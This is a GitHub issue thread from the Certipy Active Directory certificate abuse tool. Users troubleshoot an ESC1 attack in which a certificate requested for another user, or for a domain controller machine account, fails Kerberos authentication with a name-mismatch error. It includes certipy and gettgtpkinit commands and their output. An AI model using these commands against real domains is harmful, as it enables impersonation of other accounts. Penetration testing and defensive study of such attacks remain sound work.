ly4k / Certipy

Tool for Active Directory Certificate Services enumeration and abuse
MIT License
Name mismatch between certificate and user even though they match #34

Closed tmoney11 closed 2 years ago

tmoney11 commented 2 years ago

So I've got a few certs identified with ESC1 possible and I'm able to request a certificate with -alt otheruser, and the output looks like this:

[+] Trying to resolve 'CA.FULL.DOMAIN.COM' at '192.168.1.101'
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-xxxxxx'
[+] Resolved dynamic endpoint '91AE6020-xxxxx' to 'ncacn_ip_tcp:192.168.1.101[59431]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:192.168.1.101[59431]
[+] Connected to endpoint: ncacn_ip_tcp:192.1681.101[59431]
[*] Successfully requested certificate
[*] Request ID is 5063
[*] Got certificate with UPN 'otheruser'
[*] Saved certificate and private key to 'otheruser.pfx'

However, when I run: certipy auth -pfx otheruser.pfx -username 'otheruser' -domain 'full.domain.com' -dc-ip 192.168.1.100 I get:

[*] Using principal: otheruser@full.domain.com
[*] Trying to get TGT...
[-] Name mismatch between certificate and user otheruser'
[-] Verify that the username 'otheruser' matches the certificate UPN: otheruser

CA Server is 2016. I've tried multiple vulnerable certs as well as just running without the alt flag but no luck.

ly4k commented 2 years ago

Can you try to request the ESC1 with -alt 'otheruser@full.domain.com' instead?

vysecurity commented 2 years ago

Did you ever figure this one out? It's still having this issue now.

Cyb3rGh0st786 commented 1 year ago

Same for me as well. Also, in the latest version, there is no -alt flag, I guess.

@ly4k would you please help with this?

ly4k commented 1 year ago

Hello. The newest version contains the -upn flag to specify a UPN. Please try to specify the UPN as user@domain rather than just user.

Best regards

noraj commented 6 months ago

There is no -alt or -upn or -dns option for certipy auth command.

Something like that.

➜ certipy auth -pfx dc_machine_account.pfx -dc-ip 10.0.0.1       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc_machine_account$@acme.local
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'dc_machine_account$'
[-] Verify that the username 'dc_machine_account$' matches the certificate DNS Host Name: dc_machine_account.acme.local

noraj commented 6 months ago

Same mismatch error with impacket directly:

➜ gettgtpkinit -cert-pfx $(pwd)/dc_machine_account.pfx -pfx-pass '' -dc-ip 10.0.0.1 'acme.local/dc_machine_account$' dc_machine_account.tgt               
2024-04-15 15:46:29,807 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-04-15 15:46:29,867 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/usr/share/pkinittools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/usr/share/pkinittools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/usr/share/pkinittools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75"